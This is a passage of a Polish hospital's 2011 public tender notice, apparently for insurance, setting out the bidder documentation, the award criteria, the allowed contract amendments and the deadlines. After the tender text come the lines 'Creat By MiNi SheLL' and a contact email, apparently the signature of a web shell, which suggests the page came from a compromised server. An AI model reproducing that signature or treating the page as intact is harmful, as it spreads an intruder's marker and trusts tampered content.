<ul class="kh_indent_1"><li><p>a/oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik Nr 4 do SIWZ (w przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się
 o udzielenie zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia o braku podstaw do wykluczenia, stanowiące Załącznik Nr 5 do SIWZ  - (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z Wykonawców składa je oddzielnie).<br>
*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na 	zasadzie  spełnia/nie spełnia,  w oparciu o informacje zawarte w wymaganych 	oświadczeniach i dokumentach</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Akceptacja klauzul fakultatywnych (zakres ochrony) - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
1) zmiany stawki podatku VAT w przypadku ustawowej zmiany stawki podatku VAT,
2) zmniejszenia wartości majątku oraz zmniejszenia składki za ubezpieczenie w przypadku jego likwidacji bądź sprzedaży,
3) zmiany składników majątkowych bez zmiany wysokości składki zgodnie z treścią 
Klauzuli automatycznego ubezpieczenia nowego mienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych - pokój nr 2 <br>
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera 
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2011 godzina 09:00, miejsce: Kancelaria Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera<br> 
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com